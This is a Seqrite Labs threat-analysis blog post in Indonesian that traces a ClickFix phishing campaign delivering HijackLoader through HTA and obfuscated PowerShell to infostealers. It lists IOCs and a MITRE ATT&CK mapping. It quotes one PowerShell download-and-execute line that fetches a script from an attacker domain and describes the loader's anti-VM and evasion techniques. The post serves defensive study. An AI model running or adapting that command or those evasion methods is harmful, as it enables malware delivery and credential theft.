• Produk dan Layanan
        • awan

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Di tempat

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Bisnis kecil

          • SOHO Total Edition
        • Layanan

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Keamanan Siber & Data Privacy Kesadaran
  • Solusi
    • BFSI
    • Pendidikan
    • Pemerintah
    • Tenaga Kesehatan
    • ITeS
    • Manufaktur
  • Perusahaan
    • Tentang kami Seqrite
    • Kepemimpinan
    • Penghargaan & Sertifikasi
    • Ruang Berita
  • Partner
    • Program Mitra
    • Temukan Mitra
    • Menjadi Mitra
  • Bantuan
  • Publikasi
    • blog
    • Kertas putih
    • Lembaran Data
    • Studi Kasus
    • Laporan Ancaman
    • Manuals
    • PoV
    • Memahami Data Privacy
    • Periksa Skor Risiko Anda
    • Dialog DPDP
    • Jam Privasi
Seqrite Labs Blog
Hubungi Sales Sedang Diserang?
  • Produk dan Layanan
        • awan

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Di tempat

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Bisnis kecil

          • SOHO Total Edition
        • Layanan

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Keamanan Siber & Data Privacy Kesadaran
  • Solusi
    • BFSI
    • Pendidikan
    • Pemerintah
    • Tenaga Kesehatan
    • ITeS
    • Manufaktur
  • Perusahaan
    • Tentang kami Seqrite
    • Kepemimpinan
    • Penghargaan & Sertifikasi
    • Ruang Berita
  • Partner
    • Program Mitra
    • Temukan Mitra
    • Menjadi Mitra
  • Bantuan
  • Publikasi
    • blog
    • Kertas putih
    • Lembaran Data
    • Studi Kasus
    • Laporan Ancaman
    • Manuals
    • PoV
    • Memahami Data Privacy
    • Periksa Skor Risiko Anda
    • Dialog DPDP
    • Jam Privasi
Beranda  /  Teknis  / Membongkar Penipuan Siber: Analisis Kampanye Phishing Clickfix HijackLoader 
Membongkar Penipuan Siber: Analisis Kampanye Phishing Clickfix HijackLoader 
12 September 2025

Membongkar Penipuan Siber: Analisis Kampanye Phishing Clickfix HijackLoader 

Ditulis oleh Shrutirupa Banerjiee
Shrutirupa Banerjiee
Teknis

Daftar Isi 

  • Pengantar 
    • Ancaman Pemuat Serangan yang Berkembang 
    • Tujuan Blog Ini 
  • Metodologi Teknis dan Analisis 
    • Akses Awal dan Rekayasa Sosial 
    • Pengaburan dan De-pengaburan Multi-Tahap 
    • Teknik Anti-Analisis 
    • Muatan Akhir 
  • Kesimpulan  
  • IOC 
  • Penyembuhan Cepat Seqrite Proteksi 
  • Pemetaan MITRE ATT&CK 

 

Pengantar 

Seiring dengan evolusi ancaman siber, eksekusi akhir muatan berbahaya tidak lagi menjadi satu-satunya fokus industri keamanan siber. Pemuat serangan telah muncul sebagai elemen penting dalam serangan modern, berfungsi sebagai vektor utama untuk akses awal dan memungkinkan pengiriman malware canggih secara diam-diam di dalam suatu organisasi. Tidak seperti muatan sederhana, pemuat dirancang dengan tujuan khusus: untuk menghindari pertahanan keamanan, membangun persistensi, dan menciptakan lingkungan yang kondusif bagi eksekusi tersembunyi malware tahap akhir. Hal ini menjadikannya ancaman yang lebih signifikan dan relevan yang membutuhkan analisis yang terfokus. 

Baru-baru ini kita telah melihat peningkatan tajam dalam malware HijackLoader . Malware ini pertama kali muncul pada paruh kedua tahun 2023 dan dengan cepat menarik perhatian karena kemampuannya untuk mengirimkan muatan berbahaya dan tekniknya yang menarik untuk memuat dan mengeksekusinya. Malware ini sebagian besar muncul sebagai Malware-as-a-Service (Malware-as-a-Service) , yang terutama diamati dalam kampanye yang dimotivasi oleh keuntungan finansial secara global.

HijackLoader telah didistribusikan melalui installer palsu, situs web yang diracuni SEO , iklan berbahaya, dan portal perangkat lunak/film bajakan , yang memastikan basis korban yang luas dan oportunistik.

Sejak Juni 2025, kami telah mengamati penyerang menggunakan Clickfix yang menyebabkan korban yang tidak menaruh curiga mengunduh installer .msi berbahaya yang kemudian mengakibatkan eksekusi HijackLoader. DeerStealer terpantau diunduh sebagai file eksekusi terakhir di komputer korban saat itu.  

Baru-baru ini, juga diamati bahwa TAG-150 telah muncul dengan CastleLoader/CastleBot, sementara juga memanfaatkan layanan eksternal seperti HijackLoader sebagai bagian dari ekosistem Malware-as-a-Service yang lebih luas. 

HijackLoader sering mengirimkan program pencuri data dan RAT ( Remote Access Trojan) sambil terus menyempurnakan teknik operasinya. Program ini sangat terkenal karena teknik penghindaran tingkat lanjut seperti:

  • Proses doppelgänging dengan bagian yang ditransaksikan 
  • Melepas DLL sistem 
  • Panggilan sistem langsung di bawah WOW64 
  • Pemalsuan tumpukan panggilan 
  • Pemeriksaan anti-VM 

Sejak ditemukan, HijackLoader terus berkembang, menghadirkan ancaman yang terus-menerus dan terus meningkat bagi berbagai industri. Oleh karena itu, penting bagi organisasi untuk membangun dan memelihara pemantauan berkelanjutan terhadap loader semacam itu guna memitigasi risiko serangan canggih dan multi-tahap. 

Rantai Infeksi 

Rantai Infeksi

Tinjauan Teknis 

Akses awal dimulai dengan kampanye phishing rekayasa sosial berbasis CAPTCHA, yang telah kami identifikasi sebagai Clickfix (Teknik ini juga terlihat digunakan oleh penyerang pada Juni 2025).

Gbr. 1: Halaman Phishing Berbasis CAPTCHA untuk Rekayasa Sosial
Gbr2: File Dropper HTA untuk Eksekusi Awal

 Berkas HTA ini berfungsi sebagai pengunduh awal, yang mengarah ke eksekusi berkas PowerShell.   

Gbr3: Skrip Pemuat PowerShell Awal

Setelah mendekode string berkode Base64 di atas, kami memperoleh skrip PowerShell lain, seperti yang ditunjukkan di bawah ini. 

Gbr.4: Skrip PowerShell yang Disamarkan Tahap Pertama

Skrip PowerShell yang didekode di atas sangat dikaburkan, sehingga menghadirkan tantangan signifikan bagi analisis statis dan deteksi berbasis tanda tangan. Alih-alih menggunakan string dan variabel yang dapat dibaca, skrip ini secara dinamis membangun perintah dan nilai melalui operasi matematika yang kompleks dan rekonstruksi string dari array karakter. 

Saat menyelesaikan muatan di atas, kita melihatnya didekodekan ke perintah di bawah, yang meskipun masih tidak dapat dibaca, dapat sepenuhnya dikaburkan. 

Gbr5: Deobfuscation dari muatan yang dikaburkan tahap pertama

Setelah pengaburan penuh, kita melihat bahwa skrip tersebut mencoba terhubung ke URL untuk mengunduh berkas berikutnya.  

iex ((Objek Baru System.Net.WebClient).DownloadString('https://rs.mezi[.]bet/samie_bower.mp3'))  

Saat dijalankan dalam debugger, skrip ini mengembalikan kesalahan, yang menunjukkan tidak dapat terhubung ke URL.  

Gbr6: Tampilan Debugger Koneksi C2 yang Gagal

File samie-bower.mp3 adalah skrip PowerShell lain, yang dengan lebih dari 18,000 baris sangat dienkripsi dan mewakili tahap selanjutnya dari loader.

Fig7: Pemuat PowerShell Mainstage (samie_bower.mp3)

Melalui proses debugging, kami mengamati bahwa file PowerShell ini melakukan berbagai pemeriksaan Anti-VM , termasuk memeriksa jumlah proses yang berjalan dan melakukan perubahan pada kunci registri.

Fig8: Pemeriksaan Anti-Mesin Virtual dan Penghindaran Sandbox

Pemeriksaan ini tampaknya secara khusus menargetkan dan membaca pengidentifikasi VirtualBox untuk menentukan apakah skrip berjalan di lingkungan virtualisasi.

Saat menganalisis skrip tersebut, kami mengamati bahwa muatan akhir berada dalam beberapa baris terakhir, yang merupakan tempat pemuat awal yang dikaburkan mengirimkan perintah jahat terakhir. 

Fig9: Eksekusi akhir

 Deklarasi variabel omong kosong di atas telah diselesaikan; setelah dieksekusi, ia melakukan dekode Base64, operasi XOR, dan rutin dekripsi tambahan, sebelum memuat skrip PowerShell lain yang kemungkinan menyuntikkan file PE.  

Gbr10: Skrip PowerShell Menengah untuk Injeksi PE
Gbr.11: Muatan PE Tertanam yang Dikodekan Base64

 

Mendekode file ini mengungkapkan file PE yang tertanam, yang dapat diidentifikasi melalui header MZ -nya.

Gbr12: File PE yang Didekode dengan Header MZ

File PE ini adalah file eksekusi .NET yang sangat padat.

Gbr13: Muatan Eksekusi .NET yang Dikemas

Muatan yang dapat dieksekusi memuat sejumlah besar kode, kemungkinan diekstrak dari bagian sumber dayanya. 

Gbr14: Pembongkaran Dalam Memori dari .NET yang Dapat Dieksekusi

Setelah dibongkar, muatan yang dapat dieksekusi tampaknya memuat berkas DLL. 

Gbr15: DLL Terlindungi Dimuat Dalam Memori

Berkas DLL ini juga dilindungi, mungkin untuk mencegah rekayasa balik dan analisis. 

Gbr16: Indikator Perlindungan DLL

HijackLoader memiliki riwayat penggunaan proses multi-tahap yang melibatkan file executable diikuti oleh file DLL. Tahap akhir dari loader ini mencoba terhubung ke server C2, dari mana malware infostealer diunduh. Dalam hal ini, malware tersebut mencoba terhubung ke URL di bawah ini.

Gbr17: Upaya Koneksi Server C2 Terakhir

Meskipun C2 ini tidak lagi dapat diakses, upaya koneksi tersebut konsisten dengan perilaku malware NekoStealer . HijackLoader ini juga terlibat dalam mengunduh berbagai malware pencuri data, termasuk Lumma.

Kesimpulan  

Pertahanan yang sukses terhadap loader canggih seperti HijackLoader membutuhkan pengalihan fokus dari payload statis tahap akhir ke mekanisme pengirimannya yang dinamis dan terus berkembang. Dengan berfokus pada pendeteksian akses awal dan tahap perantara obfuscation, organisasi dapat membangun pertahanan yang lebih tangguh terhadap ancaman persisten ini. Sama pentingnya untuk mengadopsi pendekatan proaktif di semua lapisan, alih-alih hanya berfokus pada akses awal atau payload akhir. Lapisan perantara seringkali menjadi tempat penyerang memperkenalkan perubahan paling signifikan untuk memfasilitasi penyebaran malware yang berhasil. 

IOC: 

  • 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57 
  • 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4 
  • 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df 
  • 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d 
  • 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184 
  • e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82 
  • 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd 
  • c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e 
  • D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4 
  • 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee 
  • hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta  
  • 91 [.] 212 [.] 166 [.] 51 
  • 37[.]27[.]165[.]65:1477 
  • cosi[.]com[.]ar 
  • hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3 
  • hxxp[:]//77[.]91[.]101[.]66/ 

Penyembuhan Cepat Seqrite Perlindungan: 

  • Skrip.Trojan.49900.GC 
  • Loader.StealerDropperCiR 
  • Trojan.InfoStealerCiR 
  • Trojan.Agen 
  • BDS/511 

MITRE Att&ck: 

Taktik  ID Teknik  Nama Teknik 
Akses Awal  T1566.002  Phishing: Tautan Spearphishing (halaman phishing CAPTCHA) 
T1189  Kompromi Drive-by (malvertising, keracunan SEO, pemasang palsu) 
Execution  T1059.001  Penerjemah Perintah dan Skrip: PowerShell 
Penghindaran Pertahanan  T1027  File atau Informasi yang Disamarkan (skrip yang disamarkan multi-tahap) 
T1140  Deobfuscate/Decode File atau Informasi (Base64, decoding XOR) 
T1562.001  Merusak Pertahanan: Nonaktifkan atau Ubah Alat (melepas DLL) 
T1070.004  Penghapusan Indikator: Penghapusan File (kemungkinan digunakan dalam pemuat bertahap) 
T1211  Eksploitasi untuk Penghindaran Pertahanan (panggilan sistem langsung di bawah WOW64) 
T1036  Penyamaran (ekstensi palsu seperti .mp3 untuk skrip PowerShell) 
penemuan  T1082  Penemuan Informasi Sistem (pemeriksaan VM, kueri registri) 
T1497.001  Penghindaran Virtualisasi/Sandbox: Pemeriksaan Sistem 
Ketekunan  T1547.001  Eksekusi Boot atau Logon Autostart: Kunci Jalankan Registri (perusakan registri) 
Kegigihan / Hak Istimewa Esc.  T1055  Proses Injeksi (rutinitas injeksi PE) 
Perintah dan Kontrol (C2)  T1071.001  Protokol Lapisan Aplikasi: Protokol Web (lalu lintas HTTP/HTTPS C2) 
T1105  Transfer Alat Ingress (mengunduh muatan tambahan) 
Dampak / Koleksi  T1056/T1005  Pengambilan Input / Data dari Sistem Lokal (fungsionalitas pencuri info dari muatan akhir) 

 

Penulis: 

Niraj Lazarus Makasare 

Shrutirupa Banerjiee 

 Sebelumnya PosEcholeak- Kirim perintah, ekstrak rahasia dari Copilot AI! (CVE-20...
Posting berikutnya  Mengapa Bank Daerah dan Koperasi Tidak Dapat Lagi Mengandalkan Legacy V...
Shrutirupa Banerjiee

Tentang Shrutirupa Banerjiee

Saya Shrutirupa, saat ini bekerja sebagai Peneliti Keamanan Senior di SEQRITE LABs. Dengan pengalaman hampir 5 tahun, saya telah mengalihkan fokus saya dari blockchain...

Artikel oleh Shrutirupa Banerjiee »

Pos terkait

  • MacSync: Pencuri macOS yang Licik dengan Memanfaatkan Jebakan ClickFix

    MacSync: Pencuri macOS yang Licik dengan Memanfaatkan Jebakan ClickFix

    September 8, 2026
  • Operasi QUICSILVER: Aktor yang Berhubungan dengan China Menargetkan Diplomat Myanmar melalui Backdoor Go yang Dikirim Melalui VHD

    Operasi QUICSILVER: Aktor yang Berhubungan dengan China Menargetkan Diplomat Myanmar melalui Backdoor Go yang Dikirim Melalui VHD

    17 Agustus 2026
  • Penyalahgunaan Alur Kerja Bisnis yang Terpercaya: Kampanye Pencurian Fiktif Bertahap

    Juli 22, 2026
Penulis Unggulan
  • Seqrite
    Seqrite

    Seqrite adalah penyedia solusi keamanan siber perusahaan terkemuka. Dengan fokus pada...

    Baca artikel lebih menurut Seqrite
  • Bineesh P
    Bineesh P

    Saya seorang penggemar keamanan siber yang bersemangat dan penulis yang berdedikasi. Dengan bakat...

    Baca artikel lainnya oleh Bineesh P.
  • Jyoti Karlekar
    Jyoti Karlekar

    Saya seorang penulis yang gemar membuat konten tentang teknologi baru dan...

    Baca lebih banyak artikel oleh Jyoti Karlekar
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar adalah Direktur Pelaksana Bersama Quick Heal Technologies...

    Baca artikel lainnya oleh Sanjay Katkar
Topik
tepat (25) Serangan dunia maya (36) serangan cyber (58) cyberattack (16) cyberattacks (15) Keamanan cyber (342) keamanan cyber (34) Ancaman dunia maya (33) ancaman cyber (51) Data pelanggaran (56) pelanggaran data (29) kehilangan data (28) pencegahan kehilangan data (34) data privacy (17) perlindungan data (35) keamanan data (19) DLP (50) DPDP (14) DPDPA (17) enkripsi (16) keamanan endpoint (113) Keamanan perusahaan (20) Mengeksploitasi (13) GDPR (14) malware (76) analisis malware (14) serangan malware (23) MDM (27) Microsoft (15) MITRE ATT & CK (14) Keamanan jaringan (26) Phishing (30) ransomware (69) serangan ransomware (31) serangan ransomware (31) perlindungan ransomware (17) Seqrite (41) Seqrite enkripsi (27) Seqrite EPS (33) Seqrite Layanan (16) deteksi ancaman (14) Intelijen Ancaman (22) UTM (34) Kerentanan (16) nol kepercayaan (13)
Seqrite Labs

Penyedia solusi keamanan TI perusahaan terkemuka yang menyederhanakan keamanan titik akhir, data, dan jaringan dengan solusi pencegahan, deteksi, dan respons ancaman terbaik di kelasnya di seluruh dunia.

Baca Lebih Lanjut Tentang Seqrite

Follow us:

Berlangganan newsletter kami

Tetap terinformasi tentang tren dan wawasan keamanan siber terkini.

pemuatan
Produk dan Layanan
  • awan
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • Di tempat
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Platform
  • Malware Analysis Platform
  • Bisnis Mikro
  • SOHO Total Edition
  • Layanan
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Keamanan Siber & Data Privacy Kesadaran
Publikasi
  • blog
  • Kertas putih
  • Lembaran Data
  • Laporan Ancaman
  • Manuals
  • PoV
  • Memahami Data Privacy
  • Dialog DPDP
  • Kebijakan & Kepatuhan
  • EULA
  • GoDeep.AI
  • SIA
  • Jam Privasi
Hubungi Kami
  • Kantor Terdaftar
  • Mari Bicara Keamanan Siber
Bantuan
  • Dukungan teknis
  • Software Download
  • Pembaru Offline
  • Upgrade Firmware
  • Upgrade
  • Dokumentasi Produk
Tentang Kami
  • Tentang kami Seqrite
  • Kepemimpinan
  • Penghargaan & Pengakuan
  • Ruang Berita
Mitra kami
  • Program Mitra
  • Temukan Mitra
  • Menjadi Mitra
  • Seqrite Sertifikasi

Hak cipta © 2026 Quick Heal Technologies Ltd.

Peta Situs Privasi Kebijakan Pernyataan Hukum Kebijakan Cookie Ketentuan Penggunaan